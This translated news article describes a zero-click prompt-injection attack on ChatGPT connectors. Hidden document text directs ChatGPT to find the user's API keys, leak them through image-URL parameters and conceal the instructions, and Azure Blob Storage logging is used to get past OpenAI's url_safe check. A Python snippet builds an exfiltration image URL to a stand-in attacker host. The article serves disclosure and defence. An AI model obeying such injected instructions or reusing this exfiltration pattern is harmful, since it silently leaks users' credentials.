
A "zero-click attack" has unexpectedly emerged in ChatGPT, and API keys are easily leaked. OpenAI has not solved the problem yet.

Quantum Bit (量子位), 2025-08-12 18:07
Attackers inject malicious prompts into documents to mislead ChatGPT.

Danger! ChatGPT is vulnerable to a "zero-click attack".

Without the user clicking anything, attackers can steal sensitive data, even API keys, from third-party applications connected to ChatGPT.

The finding comes from Tamir Ishay Sharbat, a researcher who studies software security and who described the attack in a recent write-up.

OpenAI is aware of the vulnerability and has taken preventive measures, but these still do not stop attackers from intruding by other means.

Some commenters have also pointed out that this is a large-scale security issue.

Let's see what's going on.

How is the attack chain formed?

The vulnerability arises when attackers target the connection between ChatGPT and third-party applications.

Attackers inject malicious prompts into documents stored in connected third-party applications (such as Google Drive or SharePoint). When ChatGPT retrieves and processes these documents, it is tricked into sending sensitive information, packed into the parameters of an image URL, to a server controlled by the attacker.

In this way, attackers can steal sensitive data and even API keys. The technical steps are as follows.

Intrusion process

It starts with an ordinary workflow: the user uploads a document to ChatGPT for analysis and answers.

The attacker has already planted malicious instructions in the document, an invisible prompt-injection payload (for example, hidden in 1px white text), and simply waits for someone to upload it to ChatGPT for processing. The AI is then induced to carry out the attack, as shown in the figure below.

From an insider-threat perspective, a malicious employee can easily go through every document they have access to and contaminate each one.

They may even distribute long, seemingly trustworthy files to everyone, knowing that other employees are likely to upload them to ChatGPT for help.

This greatly increases the odds that the attacker's indirect prompt injection ends up inside someone's ChatGPT.

Once the injection succeeds, how does the data get back to the attacker?

The exfiltration channel is image rendering, as shown in the figure below.

If instructed to, ChatGPT will render an image from a given URL:

When ChatGPT returns Markdown image syntax, the client renders it as an image.

To steal data, attackers only need to embed the information they want to leak into the URL parameters of the image.

So when ChatGPT renders the image, the client immediately sends a request to the attacker's server, no click required, and the data is stolen.
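The mechanism is simple enough to show in a few lines. The sketch below is a minimal illustration, assuming a hypothetical attacker host and parameter name (neither comes from the article): whatever text the model is tricked into placing in the image URL's query string becomes an outbound request the moment the client renders the Markdown.

```python
from urllib.parse import urlencode

# Hypothetical host and parameter name, for illustration only.
ATTACKER_IMAGE = "https://attacker.example.com/pixel.png"

# Whatever the injected prompt tells the model to put here rides along
# in the query string of the "image" request.
leaked = {"d": "sk-...redacted-api-key..."}
markdown_image = f"![loading]({ATTACKER_IMAGE}?{urlencode(leaked)})"

print(markdown_image)
# ![loading](https://attacker.example.com/pixel.png?d=sk-...redacted-api-key...)
# Rendering this image triggers a GET request with no user click; the query
# string then appears verbatim in the access log of whoever hosts the image.
```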

How, then, do attackers steal users' API keys?

The attacker embeds the following prompt-injection payload into a document and waits for the victim to feed that document into ChatGPT, as described above.

This is the complete prompt injection payload created by the attacker:

As shown in the figure above, the injected prompt instructs ChatGPT not to summarize the document but to do the following instead:

1. Go to the user's connected Google Drive and search for API keys.

2. Once API keys are found, embed them in the following phrase:

This makes ChatGPT render an image whose URL points at the attacker's Beeceptor endpoint (a mock-API service), with the victim's API keys attached as URL parameters.

3. To avoid detection, the attacker tells ChatGPT not to mention the new instructions it received, because they are "not relevant now".

OpenAI's preventive measures

OpenAI has recognized that client-side image rendering is a powerful data-leakage path and has deployed measures against this kind of vulnerability.

Specifically, before an image is rendered, the client applies a mitigation that checks whether the URL is safe or malicious.

The mitigation sends the URL to an endpoint called url_safe, and the image is rendered only if the URL is judged safe.

An attacker's arbitrary Beeceptor endpoint is identified as unsafe, so the image is never rendered.
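OpenAI has not published how url_safe decides what is safe, so the following is only a conceptual sketch of the general idea: check the image URL against hosts considered trustworthy before rendering it. The allowlist entries are hypothetical. Note what such a check does and does not look at: it can reject an arbitrary Beeceptor domain, but it says nothing about the query string attached to an otherwise trusted host, which is the gap the bypass described next exploits.

```python
from urllib.parse import urlparse

# Conceptual sketch only; not OpenAI's actual url_safe logic.
TRUSTED_IMAGE_HOSTS = {
    "upload.wikimedia.org",               # hypothetical allowlist entry
    "example.blob.core.windows.net",      # hypothetical Azure Blob entry
}

def is_url_safe(url: str) -> bool:
    """Allow rendering only for HTTPS URLs on an explicitly trusted host."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in TRUSTED_IMAGE_HOSTS

# A random Beeceptor endpoint is rejected...
print(is_url_safe("https://random-tenant.free.beeceptor.com/x.png?d=secret"))   # False
# ...but a trusted-looking blob host passes, query string and all.
print(is_url_safe("https://example.blob.core.windows.net/img/x.png?d=secret"))  # True
```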

However, attackers have also found a way to bypass this preventive measure.

How do attackers bypass it?

Attackers know that ChatGPT readily renders images hosted on Azure Blob Storage, a cloud storage service on Microsoft's Azure platform.

They also connect their Azure Blob Storage to Azure Log Analytics, so that every request for any image blob in their storage account generates a log entry.

Crucially, that log entry records all the parameters sent with the request.

So instead of having ChatGPT render an image from the Beeceptor endpoint, the attacker commands it to render one from Azure Blob Storage, with the data to be stolen included as request parameters, as shown in the figure below.

When the victim summarizes the document, they will get the following response:

As shown in the figure below, the attacker's image is rendered successfully, and a tidy request log containing the victim's API keys shows up in Azure Log Analytics.

In this way, the attack is successful.

Attack risks and overall preventive measures

Beyond the attack above, attackers also use other techniques to talk large AI models into doing unauthorized things, for example using special characters or "storytelling" to slip past the AI's safety rules and execute malicious instructions.

Traditional security training, such as teaching employees not to click suspicious links or phishing emails, does not protect against this vulnerability either.

After all, once a tainted document circulates internally and an employee uploads it to the AI for analysis, the data is stolen silently in the background, with no click involved.

It is becoming more and more common for enterprises to adopt AI to improve overall efficiency.

But AI tools with security vulnerabilities this serious pose a major risk of wholesale enterprise data leakage (an HR manual on a SharePoint site, financial documents, strategic plans), and the problem needs to be addressed urgently.

Nor is this an isolated case. Beyond ChatGPT, the "EchoLeak" vulnerability in Microsoft's Copilot works along similar lines, not to mention the various prompt-injection attacks against other AI assistants.

Therefore, some security experts have put forward the following preventive suggestions:

  • Implement strict access control for AI connector permissions and follow the principle of least privilege.
  • Deploy monitoring solutions specifically designed for AI agent activities.
  • Educate users about the risks of "uploading documents from unknown sources to AI systems" (a simple pre-upload check is sketched after this list).
  • Consider network-level monitoring to detect abnormal data access patterns.
  • Regularly audit connected services and their permission levels.
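Complementing that third suggestion, below is a minimal, hypothetical sketch of such a pre-upload check. It assumes incoming documents are .docx files and uses the third-party python-docx package to flag the kind of invisible text described earlier: runs that are marked hidden, colored white, or set in an unreadably small font. It is a heuristic, not a guarantee; it inspects only body paragraphs, and payloads can also hide in tables, headers, comments, or embedded objects.

```python
from docx import Document               # third-party package: python-docx
from docx.shared import Pt, RGBColor

WHITE = RGBColor(0xFF, 0xFF, 0xFF)

def suspicious_runs(path):
    """Yield text runs that look deliberately invisible to a human reader."""
    for paragraph in Document(path).paragraphs:    # body paragraphs only
        for run in paragraph.runs:
            font = run.font
            hidden = font.hidden is True
            white = font.color.rgb == WHITE        # .rgb is None if no explicit color
            tiny = font.size is not None and font.size < Pt(2)
            if run.text.strip() and (hidden or white or tiny):
                yield run.text

if __name__ == "__main__":
    for text in suspicious_runs("incoming.docx"):
        print("possible hidden instruction:", text[:80])
```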

Those suggestions are aimed at enterprises. For individual AI users, paying attention to the small details of everyday AI use may be more useful.

Have you ever had a document's content come back misinterpreted, or noticed a response that just felt "off"?

Let's share our experiences in the comment section and help each other avoid pitfalls!

Reference links

[1]https://labs.zenity.io/p/agentflayer-chatgpt-connectors-0click-attack-5b41

[2]https://x.com/deedydas/status/1954600351098876257

[3]https://cybersecuritynews.com/chatgpt-0-click-connectors-vulnerability/

This article is from the WeChat official account "Quantum Bit". The author is Yiran. It is published by 36Kr with authorization.